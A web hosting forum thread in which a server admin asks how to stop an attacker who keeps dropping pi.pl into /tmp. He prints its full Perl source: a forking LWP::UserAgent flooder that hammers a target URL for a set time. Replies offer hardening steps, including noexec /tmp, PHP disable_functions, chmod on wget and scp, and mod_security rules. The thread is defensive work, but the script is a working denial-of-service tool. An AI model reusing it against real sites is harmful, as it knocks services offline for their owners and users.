perl script in tmp folder causing server to crash

[mher]

Hello

Hello,

Every few hours someone is uploading a perl script in my tmp directory and running it and causing the server to overload. The file is pi.pl and i don't know how to trace it. I just kill the process to stop it and make the server load back to normal.

I tried searching the domlogs for pi.pl but nothing found. I also added this rule to mod_security
SecFilterSelective THE_REQUEST "tmp "
SecFilterSelective THE_REQUEST "pi.pl "

but it's happenning again. I don't know how to stop this. any thoughts?

The content of pi.pl is this:

#!/usr/bin/perl
use LWP::UserAgent;
use Time::localtime;
my $d=localtime(time);
$s1=$d->yday();
$s2=$d->hour();
$s3=$d->min();
$s=((($s1*24)+$s2)*60)+$s3;
while (1){
for ($i=1;$i<=$ARGV[1];$i++){
my $d=localtime(time);
$s1=$d->yday();
$s2=$d->hour();
$s3=$d->min();
$e=((($s1*24)+$s2)*60)+$s3;
if (($e-$s)>$ARGV[2]) {
killpidz();
exit;
}
if ($pid=fork()){
push(@forked,$pid);
}else{
$browser = LWP::UserAgent->new;
$browser->timeout(5);
$res=$browser->get($ARGV[0]);
$data=$res->content;
exit;
}}
killpidz();
}
sub killpidz {
foreach (@forked) {
chomp;
waitpid($_,0);
kill("TERM" => $_)
}
undef @forked;
}
exit;

[NightStorm]

Mounting /tmp with noexec is one option... although, if they are executing the code with a full path, it will still run (most kiddies have figured this out by now).

Harden your php... run in safe_mode, set your open_basedir through "Tweak Security" properly, and use the "disable_functions" setting in your php.ini. I have mine set to "dl,system,exec,passthru,shell_exec".

chmod 750 /usr/bin/rcp
chmod 750 /usr/bin/wget
chmod 750 /usr/bin/lynx
chmod 750 /usr/bin/links
chmod 750 /usr/bin/scp

Lock down your mod_security. There is an extensive list of mod_sec rules here on the forum. Run a search for mod_security and they will come up.

compile php to use phpSUexec. This will force the files to run as their owners, instead of as nobody. This may not exactly stop the files from ending up in your /tmp folder, but it WILL assign them to the owner that put them there, and allow you to easily track down the site responsible.

Check for easily exploitable systems like phpBB installed on the server. If there are any, assure they are up to date on the latest patches and security fixes. Some site admins get lazy about this, and it causes the server owners nothing but headaches.

There are a few posts around here about how to secure your server. I suggest checking into them... and I seriously suggest looking into Chirpy's cPanel Firewall module. It rocks hard, and has settings that will tell you when rogue scripts start causing trouble, and will even tell you who owns them, and what files they are using to run.

[mher]

Thank you. Is there a way to disable LWP::UserAgent in perl?

[katmai]

i suggest an admin to remove the code, just because we don't know who might browse the forum ...

[avijit]

Install mod_sec and add a moderate mod_sec ruleset to prevent this.

[Marty]

Install mod_sec and add a moderate mod_sec ruleset to prevent this.

I think if you will read the posters post, you will find that he has already done that.